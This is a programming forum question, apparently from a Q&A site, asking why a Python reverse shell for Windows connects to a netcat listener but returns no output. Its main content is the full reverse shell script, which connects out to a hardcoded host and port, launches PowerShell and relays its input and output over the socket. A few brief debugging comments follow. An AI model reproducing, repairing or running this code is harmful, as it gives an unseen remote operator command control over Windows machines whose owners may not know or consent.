# Windows Python Reverse Shell, Connects But No Interaction

Tags: python, windows, reverse

I have a working Python reverse shell for windows but, when i use nc to connect to the incoming connection it successfully connects.

Although, i cannot interact with the remote powershell session, what have i dun wrong.
Thanks

```
import os,socket,subprocess,threading;
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)

def p2s(s, p):
    while True:
        s.send(p.stdout.read(1))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.10",800))

p=subprocess.Popen(["\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
```

Comment: Do you get any error? What happens when you execute the script?

Comment: If the port is open on the remote end it connects successfully without any errors at either.
Also, when entering commands at the remote end nothing happens, the commands are displayed in the remote terminal but, no output is displayed at either end.
I am not sure how to debug this further.

Comment: Try [Paramiko](https://www.paramiko.org/)

Comment: Thanks, but unless i am wrong this uses ssh, i don't want to use ssh for security reasons.